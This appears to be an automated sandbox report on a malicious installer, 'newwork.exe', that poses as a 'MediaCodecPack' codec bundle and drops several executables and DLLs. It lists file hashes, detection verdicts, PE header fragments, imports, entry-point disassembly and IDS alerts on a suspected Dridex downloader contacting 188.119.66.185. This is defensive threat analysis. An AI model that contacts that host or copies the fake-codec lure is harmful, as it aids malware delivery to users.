                                                                              SHA-512:E56D6EC9170DEBAC28BB514942F794F73D4C194D04C54EFF9227B6EE3C74BA4FCF239FFF0BB6556DC8B847FA89D382AF206A2C481C41A3510936B0A74192D2C2
                                                                              Malicious:false
                                                                              Preview:ITSF....`..........E.......|.{.......".....|.{......."..`...............x.......T.......................g1..............ITSP....T...........................................j..].!......."..T...............PMGLW................/..../#IDXHDR...F.../#ITBITS..../#IVB...N$./#STRINGS.....P./#SYSTEM..N.'./#TOPICS...F.0./#URLSTR...:.t./#URLTBL...v.D./$FIftiMain......1./$OBJINST...z.../$WWAssociativeLinks/..../$WWAssociativeLinks/Property...v../$WWKeywordLinks/..../$WWKeywordLinks/Property...r../After.jpg...4..../Auto-.hhc...^./Auto-Adjustment.htm....?./Auto-BleachTeeth.htm...z.3./Auto-Crop2Plus.htm..U.j./Auto-Emphasis.htm...w.V./Auto-EyeColor.htm...!.../Auto-EyePencil.htm..._.../Auto-EyeShadow.htm...,.3./Auto-GettingStarted.htm....Q./Auto-Lipstick.htm..R.M./Auto-Liquify.htm...-.v./Auto-Menu.htm..S.r./Auto-OrderingInformation.htm...Q.../Auto-Overview.htm..^.$./Auto-Powder.htm......./Auto-Resize.htm..s.b./Auto-Rotation.htm..?.e./Auto-Rouge.htm...=.d./Auto-SkinCare.htm...|.{./Auto-SmartPatchCosmet
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp
                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):176128
                                                                              Entropy (8bit):6.204917493416147
                                                                              Encrypted:false
                                                                              SSDEEP:3072:l9iEoC1+7N9UQV2Mi8NTUU3/EO3h3E9y6GeoPRtsoWhi75MUbvSHQ:l+ssU62Mi8x9P/UVGeQRthMUbvS
                                                                              MD5:FEC4FF0C2967A05543747E8D552CF9DF
                                                                              SHA1:B4449DC0DF8C0AFCC9F32776384A6F5B5CEDE20C
                                                                              SHA-256:5374148EBCF4B456F8711516A58C9A007A393CA88F3D9759041F691E4343C7D6
                                                                              SHA-512:93E3F48CD393314178CBC86F6142D577D5EAAE52B47C4D947DBA4DFB706860B150FF5B0E546CB83114CA44666E9DF6021964D79D064B775A58698DAA9550EF13
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+0.J^..J^..J^.cE...J^..VR..J^..UU..J^.#VP..J^..UT..J^..UZ..J^..kU..J^..kZ..J^..J_..J^..iT..J^..io..J^.gLX..J^._jZ..J^.Rich.J^.................PE..L.....L...........!.....0...@.......'.......@...................................................................... e..k....X..d....`.......................p..p....................................................@...............................text....".......0.................. ..`.rdata...%...@...0...@..............@..@.data...T....p... ...p..............@....rsrc........`......................@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:modified
                                                                              Size (bytes):3193465
                                                                              Entropy (8bit):6.245419881846555
                                                                              Encrypted:false
                                                                              SSDEEP:49152:IG+iVWmBka3ISMod7hra7Xq1WkWkQW8uEFk:B1VWIkOISM89ra7Xq1WkW4rJ
                                                                              MD5:49FC2D4BA26F2EEF94CCC6B71EB0AD96
                                                                              SHA1:BC2B35A763A9B6EF1CDB599FE1AD5933B528E9E0
                                                                              SHA-256:FD66C66EF0DAD6BAA7DE9CFA8CD552D8D44DFB09531110EF3CE9D7B851BB5E0B
                                                                              SHA-512:73A58CB7F609F1BD049EEDDA9D295D07437E35D2D17ACC6C5D4A774710A50C134770031800033A943898E6848358DBC573168CBC199DF4848F46CDD7C5936BD3
                                                                              Malicious:true
                                                                              Yara Hits:
                                                                              • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe, Author: Joe Security
                                                                              Antivirus:
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................PE..L.....bg.................j...D.......#............@...........................1.....m.0.....................................4........ .................................................................................\............................aitt4...h.......j.................. ..`.ajtt4...-...........n..............@..@.aktt4...d.......0..................@....rsrc........ ......................@..@.altt4...@......y>...|..............`./.........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp
                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):499712
                                                                              Entropy (8bit):6.414789978441117
                                                                              Encrypted:false
                                                                              SSDEEP:12288:fJzxYPVsBnxO/R7krZhUgiW6QR7t5k3Ooc8iHkC2eq:fZxvBnxOJ7ki3Ooc8iHkC2e
                                                                              MD5:561FA2ABB31DFA8FAB762145F81667C2
                                                                              SHA1:C8CCB04EEDAC821A13FAE314A2435192860C72B8
                                                                              SHA-256:DF96156F6A548FD6FE5672918DE5AE4509D3C810A57BFFD2A91DE45A3ED5B23B
                                                                              SHA-512:7D960AA8E3CCE22D63A6723D7F00C195DE7DE83B877ECA126E339E2D8CC9859E813E05C5C0A5671A75BB717243E9295FD13E5E17D8C6660EB59F5BAEE63A7C43
                                                                              Malicious:false
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............................................................................Rich...................PE..L.....w>...........!.................-............:|................................~e..............................$...?...d!..<....`.......................p...0..8...8...............................H............................................text............................... ..`.rdata..2*.......0..................@..@.data...h!...0... ...0..............@....rsrc........`.......P..............@..@.reloc...0...p...@...`..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp
                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):348160
                                                                              Entropy (8bit):6.542655141037356
                                                                              Encrypted:false
                                                                              SSDEEP:6144:OcV9z83OtqxnEYmt3NEnvfF+Tbmbw6An8FMciFMNrb3YgxxpbCAOxO2ElvlE:Ooz83OtIEzW+/m/AyF7bCrO/E
                                                                              MD5:86F1895AE8C5E8B17D99ECE768A70732
                                                                              SHA1:D5502A1D00787D68F548DDEEBBDE1ECA5E2B38CA
                                                                              SHA-256:8094AF5EE310714CAEBCCAEEE7769FFB08048503BA478B879EDFEF5F1A24FEFE
                                                                              SHA-512:3B7CE2B67056B6E005472B73447D2226677A8CADAE70428873F7EFA5ED11A3B3DBF6B1A42C5B05B1F2B1D8E06FF50DFC6532F043AF8452ED87687EEFBF1791DA
                                                                              Malicious:false
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........2..S..S..S..Tp..S..S..5S..BX..S..BX...S..BX..Q..BX..S..BX..S..BX..S..Rich.S..........................PE..L.....V>...........!................."............4|.........................`......................................t....C......(.... .......................0..d+..H...8...........................x...H...............l............................text............................... ..`.rdata..@...........................@..@.data... h.......`..................@....rsrc........ ......................@..@.reloc..d+...0...0... ..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):645592
                                                                              Entropy (8bit):6.50414583238337
                                                                              Encrypted:false
                                                                              SSDEEP:12288:i0zrcH2F3OfwjtWvuFEmhx0Cj37670jwX+E7tFKm0qTYh:iJUOfwh8u9hx0D70NE7tFTYh
                                                                              MD5:E477A96C8F2B18D6B5C27BDE49C990BF
                                                                              SHA1:E980C9BF41330D1E5BD04556DB4646A0210F7409
                                                                              SHA-256:16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                                                                              SHA-512:335A86268E7C0E568B1C30981EC644E6CD332E66F96D2551B58A82515316693C1859D87B4F4B7310CF1AC386CEE671580FDD999C3BCB23ACF2C2282C01C8798C
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=S.v..?......!................X..............`......................... ......8......... .................................L................................'......................................................p............................text...............................`.0`.data...............................@.@..rdata..$...........................@.@@.bss..................................@..edata..............................@.0@.idata..L...........................@.0..CRT................................@.0..tls.... ...........................@.0..reloc...'.......(..................@.0B/4......`....0......................@.@B/19..........@......................@..B/35.....M....P......................@..B/51.....`C...`...D..................@..B/63..................8..............@..B/77..................F..............@..B/89..................R..
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):717985
                                                                              Entropy (8bit):6.51490177808013
                                                                              Encrypted:false
                                                                              SSDEEP:12288:FTPcYn5c/rPx37/zHBA6a5UeYpthr1CERAgrNuR+AIq5MRxyFw:NPcYn5c/rPx37/zHBA6pFptZ1CENqMR1
                                                                              MD5:C1270D7DFE9B50EF58128A8A0BDD34D3
                                                                              SHA1:8AE6DAE0B1B12F22A751902CD95F19F27BCC30FA
                                                                              SHA-256:F2859E4DA15F04941801E71E6F4384D25EF13DA6F1ED24415D6C2F1CDEDEAF45
                                                                              SHA-512:B299367DF684BC218723BC478435CAD8F40F7ABD43B5B4DE78F00D0BF4C0EB06639788C26DA64046FDCF2EE850F6D645BF843DB11516497E42C58A14498A835C
                                                                              Malicious:true
                                                                              Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................~........................@..............................................@...............................%..................................................................................................................CODE.....}.......~.................. ..`DATA................................@...BSS......................................idata...%.......&..................@....tls.....................................rdata..............................@..P.reloc....... ......................@..P.rsrc...............................@..P.....................T..............@..P........................................................................................................................................
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp
                                                                              File Type:InnoSetup Log MediaCodecPack, version 0x30, 4678 bytes, 364339\user, "C:\Users\user\AppData\Local\MediaCodecPack 1.0.11"
                                                                              Category:dropped
                                                                              Size (bytes):4678
                                                                              Entropy (8bit):4.715247277641487
                                                                              Encrypted:false
                                                                              SSDEEP:96:df2JXdWO38DpTlII39V+eOIhPea7ICSss/Lny4xNES9JYMJaJacPW:df2ldWO3opTliHIhPpICSsAny4HES9JD
                                                                              MD5:D3FCF7A45101FDA8193B3274051E6ECA
                                                                              SHA1:6B779282B46742CF1A3CCFF5B47C0EE0EF3E443D
                                                                              SHA-256:E4D5720B65F7E960081D7B658633F67B0E613D9BAE48F6E833AD2B41B2CED81F
                                                                              SHA-512:F4081EDB12C815C02ABAD4ED1BF623F8892769EA86A84C41A30A86214980B29954D7418940327228BF26692078AB5972E9B5D05B10B65C03EE65E462AD18A1B2
                                                                              Malicious:false
                                                                              Preview:Inno Setup Uninstall Log (b)....................................MediaCodecPack..................................................................................................................MediaCodecPack..................................................................................................................0.......F...%...............................................................................................................d..J........xC?r......P....364339.user1C:\Users\user\AppData\Local\MediaCodecPack 1.0.11...........1...... ............IFPS.............................................................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TPASSWORDEDIT....TPASSWORDEDIT...........................................!MAIN....-1..(...dll:kernel32.dll.CreateFileA..............$...dll:kernel32.dll.WriteFile............"...dll:kernel32.dll.CloseHandle........"...dll:kernel32.dll.ExitProcess........%...dll:User32
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):717985
                                                                              Entropy (8bit):6.51490177808013
                                                                              Encrypted:false
                                                                              SSDEEP:12288:FTPcYn5c/rPx37/zHBA6a5UeYpthr1CERAgrNuR+AIq5MRxyFw:NPcYn5c/rPx37/zHBA6pFptZ1CENqMR1
                                                                              MD5:C1270D7DFE9B50EF58128A8A0BDD34D3
                                                                              SHA1:8AE6DAE0B1B12F22A751902CD95F19F27BCC30FA
                                                                              SHA-256:F2859E4DA15F04941801E71E6F4384D25EF13DA6F1ED24415D6C2F1CDEDEAF45
                                                                              SHA-512:B299367DF684BC218723BC478435CAD8F40F7ABD43B5B4DE78F00D0BF4C0EB06639788C26DA64046FDCF2EE850F6D645BF843DB11516497E42C58A14498A835C
                                                                              Malicious:true
                                                                              Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................~........................@..............................................@...............................%..................................................................................................................CODE.....}.......~.................. ..`DATA................................@...BSS......................................idata...%.......&..................@....tls.....................................rdata..............................@..P.reloc....... ......................@..P.rsrc...............................@..P.....................T..............@..P........................................................................................................................................
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp
                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):2560
                                                                              Entropy (8bit):2.8818118453929262
                                                                              Encrypted:false
                                                                              SSDEEP:24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
                                                                              MD5:A69559718AB506675E907FE49DEB71E9
                                                                              SHA1:BC8F404FFDB1960B50C12FF9413C893B56F2E36F
                                                                              SHA-256:2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
                                                                              SHA-512:E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.c.W.c.W.c...>.T.c.W.b.V.c.R.<.V.c.R.?.V.c.R.9.V.c.RichW.c.........................PE..L....b.@...........!......................... ...............................@......................................p ..}.... ..(............................0....................................................... ...............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp
                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):6144
                                                                              Entropy (8bit):4.289297026665552
                                                                              Encrypted:false
                                                                              SSDEEP:48:Sv1LfWvPcXegCPUo1vlZQrAxoONfHFZONfH3d1xCWMBFNL2pGSS4k+bkg6j0KHc:wfkcXegaJ/ZAYNzcld1xaX12pfSKvkc
                                                                              MD5:C8871EFD8AF2CF4D9D42D1FF8FADBF89
                                                                              SHA1:D0EACD5322C036554D509C7566F0BCC7607209BD
                                                                              SHA-256:E4FC574A01B272C2D0AED0EC813F6D75212E2A15A5F5C417129DD65D69768F40
                                                                              SHA-512:2735BB610060F749E26ACD86F2DF2B8A05F2BDD3DCCF3E4B2946EBB21BA0805FB492C474B1EEB2C5B8BF1A421F7C1B8728245F649C644F4A9ECC5BD8770A16F6
                                                                              Malicious:false
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....HP..........#............................@.............................`..............................................................<!.......P.......@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc........P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp
                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):23312
                                                                              Entropy (8bit):4.596242908851566
                                                                              Encrypted:false
                                                                              SSDEEP:384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
                                                                              MD5:92DC6EF532FBB4A5C3201469A5B5EB63
                                                                              SHA1:3E89FF837147C16B4E41C30D6C796374E0B8E62C
                                                                              SHA-256:9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
                                                                              SHA-512:9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
                                                                              Malicious:false
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Users\user\Desktop\newwork.exe.1.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):706560
                                                                              Entropy (8bit):6.506374420963084
                                                                              Encrypted:false
                                                                              SSDEEP:12288:NTPcYn5c/rPx37/zHBA6a5UeYpthr1CERAgrNuR+AIq5MRxyF:FPcYn5c/rPx37/zHBA6pFptZ1CENqMRU
                                                                              MD5:ED6A19AD054AD0172201AF725324781B
                                                                              SHA1:817F409DBE431AE71D3AB4D70181257C3BEE4DBD
                                                                              SHA-256:79DB034686A25A6BA5DEF19B0CDEDB7097A78F994FB4A1CD33765E0FD49C9423
                                                                              SHA-512:D5D67F03F50D6EED159BB967735B9AE2ADDA579110D35A23A76BC2DF2B023122805C64E913A2A333B45EE8412F799BAC1538C8D4573DCDA7BB8147ACB6445729
                                                                              Malicious:true
                                                                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................~........................@..............................................@...............................%..................................................................................................................CODE.....}.......~.................. ..`DATA................................@...BSS......................................idata...%.......&..................@....tls.....................................rdata..............................@..P.reloc....... ......................@..P.rsrc...............................@..P.....................T..............@..P........................................................................................................................................
                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Entropy (8bit):7.997606116225022
                                                                              TrID:
                                                                              • Win32 Executable (generic) a (10002005/4) 98.73%
                                                                              • Inno Setup installer (109748/4) 1.08%
                                                                              • Windows Screen Saver (13104/52) 0.13%
                                                                              • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                              File name:newwork.exe.1.exe
                                                                              File size:3'314'669 bytes
                                                                              MD5:27b4fa67c0810bc212077971a00854ea
                                                                              SHA1:39d4dbe69f339c608a3f9ecf7f718c25e1c0dfbb
                                                                              SHA256:2fc18ce155e0b723ffe70b0ed7fa5ff85a03b50d90367e8a1c5591e88af2089e
                                                                              SHA512:bdb5c6f3fa1ea7b99df763f02919e044882b581bb6ad308da52a7885bb308ca70eaa477dc84bbde627427acb013d8fadf5694c3168cfa580f7a0978574f13018
                                                                              SSDEEP:98304:MfMeg4PkQUbNkhS0F6p1bfXNLDYtNmeJX2:g9PknkhSj1bf9LsmeF2
                                                                              TLSH:FFE533FE7F84DD32F23604B95B2601BAC32B3D68196BA26837DD2C9E1F111A16971371
                                                                              File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                              Icon Hash:2d2e3797b32b2b99
                                                                              Entrypoint:0x40a5f8
                                                                              Entrypoint Section:CODE
                                                                              Digitally signed:false
                                                                              Imagebase:0x400000
                                                                              Subsystem:windows gui
                                                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                              DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                              Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                              TLS Callbacks:
                                                                              CLR (.Net) Version:
                                                                              OS Version Major:1
                                                                              OS Version Minor:0
                                                                              File Version Major:1
                                                                              File Version Minor:0
                                                                              Subsystem Version Major:1
                                                                              Subsystem Version Minor:0
                                                                              Import Hash:884310b1928934402ea6fec1dbd3cf5e
                                                                              Instruction
                                                                              push ebp
                                                                              mov ebp, esp
                                                                              add esp, FFFFFFC4h
                                                                              push ebx
                                                                              push esi
                                                                              push edi
                                                                              xor eax, eax
                                                                              mov dword ptr [ebp-10h], eax
                                                                              mov dword ptr [ebp-24h], eax
                                                                              call 00007F1B5D525E53h
                                                                              call 00007F1B5D52705Ah
                                                                              call 00007F1B5D5272E9h
                                                                              call 00007F1B5D52738Ch
                                                                              call 00007F1B5D52932Bh
                                                                              call 00007F1B5D52BC96h
                                                                              call 00007F1B5D52BDFDh
                                                                              xor eax, eax
                                                                              push ebp
                                                                              push 0040ACC9h
                                                                              push dword ptr fs:[eax]
                                                                              mov dword ptr fs:[eax], esp
                                                                              xor edx, edx
                                                                              push ebp
                                                                              push 0040AC92h
                                                                              push dword ptr fs:[edx]
                                                                              mov dword ptr fs:[edx], esp
                                                                              mov eax, dword ptr [0040C014h]
                                                                              call 00007F1B5D52C8ABh
                                                                              call 00007F1B5D52C496h
                                                                              cmp byte ptr [0040B234h], 00000000h
                                                                              je 00007F1B5D52D38Eh
                                                                              call 00007F1B5D52C9A8h
                                                                              xor eax, eax
                                                                              call 00007F1B5D526B49h
                                                                              lea edx, dword ptr [ebp-10h]
                                                                              xor eax, eax
                                                                              call 00007F1B5D52993Bh
                                                                              mov edx, dword ptr [ebp-10h]
                                                                              mov eax, 0040CE28h
                                                                              call 00007F1B5D525EEAh
                                                                              push 00000002h
                                                                              push 00000000h
                                                                              push 00000001h
                                                                              mov ecx, dword ptr [0040CE28h]
                                                                              mov dl, 01h
                                                                              mov eax, 0040738Ch
                                                                              call 00007F1B5D52A1CAh
                                                                              mov dword ptr [0040CE2Ch], eax
                                                                              xor edx, edx
                                                                              push ebp
                                                                              push 0040AC4Ah
                                                                              push dword ptr fs:[edx]
                                                                              mov dword ptr fs:[edx], esp
                                                                              call 00007F1B5D52C906h
                                                                              mov dword ptr [0040CE34h], eax
                                                                              mov eax, dword ptr [0040CE34h]
                                                                              cmp dword ptr [eax+0Ch], 00000000h
                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xd0000x950.idata
                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x110000x2c00.rsrc
                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_TLS0xf0000x18.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                              CODE0x10000x9d300x9e00c3bd95c4b1a8e5199981e0d9b45fd18cFalse0.6052709651898734data6.631765876950794IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                              DATA0xb0000x2500x4001ee71d84f1c77af85f1f5c278f880572False0.306640625data2.751820662285145IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                              BSS0xc0000xe8c0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                              .idata0xd0000x9500xa00bb5485bf968b970e5ea81292af2acdbaFalse0.414453125data4.430733069799036IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                              .tls0xe0000x80x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                              .rdata0xf0000x180x2009ba824905bf9c7922b6fc87a38b74366False0.052734375data0.2044881574398449IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                              .reloc0x100000x8c40x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                              .rsrc0x110000x2c000x2c000c0c7ee3853390cc0c21088a78f34d65False0.32555042613636365data4.491927698819795IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                              RT_ICON0x113540x128Device independent bitmap graphic, 16 x 32 x 4, image size 192DutchNetherlands0.5675675675675675
                                                                              RT_ICON0x1147c0x568Device independent bitmap graphic, 16 x 32 x 8, image size 320DutchNetherlands0.4486994219653179
                                                                              RT_ICON0x119e40x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640DutchNetherlands0.4637096774193548
                                                                              RT_ICON0x11ccc0x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152DutchNetherlands0.3935018050541516
                                                                              RT_STRING0x125740x2f2data0.35543766578249336
                                                                              RT_STRING0x128680x30cdata0.3871794871794872
                                                                              RT_STRING0x12b740x2cedata0.42618384401114207
                                                                              RT_STRING0x12e440x68data0.75
                                                                              RT_STRING0x12eac0xb4data0.6277777777777778
                                                                              RT_STRING0x12f600xaedata0.5344827586206896
                                                                              RT_RCDATA0x130100x2cdata1.1818181818181819
                                                                              RT_GROUP_ICON0x1303c0x3edataEnglishUnited States0.8387096774193549
                                                                              RT_VERSION0x1307c0x4f4dataEnglishUnited States0.2610410094637224
                                                                              RT_MANIFEST0x135700x5a4XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.42590027700831024
                                                                              DLLImport
                                                                              kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, WideCharToMultiByte, TlsSetValue, TlsGetValue, MultiByteToWideChar, GetModuleHandleA, GetLastError, GetCommandLineA, WriteFile, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetSystemTime, GetFileType, ExitProcess, CreateFileA, CloseHandle
                                                                              user32.dllMessageBoxA
                                                                              oleaut32.dllVariantChangeTypeEx, VariantCopyInd, VariantClear, SysStringLen, SysAllocStringLen
                                                                              advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA
                                                                              kernel32.dllWriteFile, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, Sleep, SizeofResource, SetLastError, SetFilePointer, SetErrorMode, SetEndOfFile, RemoveDirectoryA, ReadFile, LockResource, LoadResource, LoadLibraryA, IsDBCSLeadByte, GetWindowsDirectoryA, GetVersionExA, GetUserDefaultLangID, GetSystemInfo, GetSystemDefaultLCID, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeProcess, GetEnvironmentVariableA, GetCurrentProcess, GetCommandLineA, GetACP, InterlockedExchange, FormatMessageA, FindResourceA, DeleteFileA, CreateProcessA, CreateFileA, CreateDirectoryA, CloseHandle
                                                                              user32.dllTranslateMessage, SetWindowLongA, PeekMessageA, MsgWaitForMultipleObjects, MessageBoxA, LoadStringA, ExitWindowsEx, DispatchMessageA, DestroyWindow, CreateWindowExA, CallWindowProcA, CharPrevA
                                                                              comctl32.dllInitCommonControls
                                                                              advapi32.dllAdjustTokenPrivileges
                                                                              Language of compilation systemCountry where language is spokenMap
                                                                              DutchNetherlands
                                                                              EnglishUnited States
                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                              2024-12-18T13:50:44.078830+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.1049838188.119.66.185443TCP
                                                                              2024-12-18T13:50:44.786700+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1049838188.119.66.185443TCP
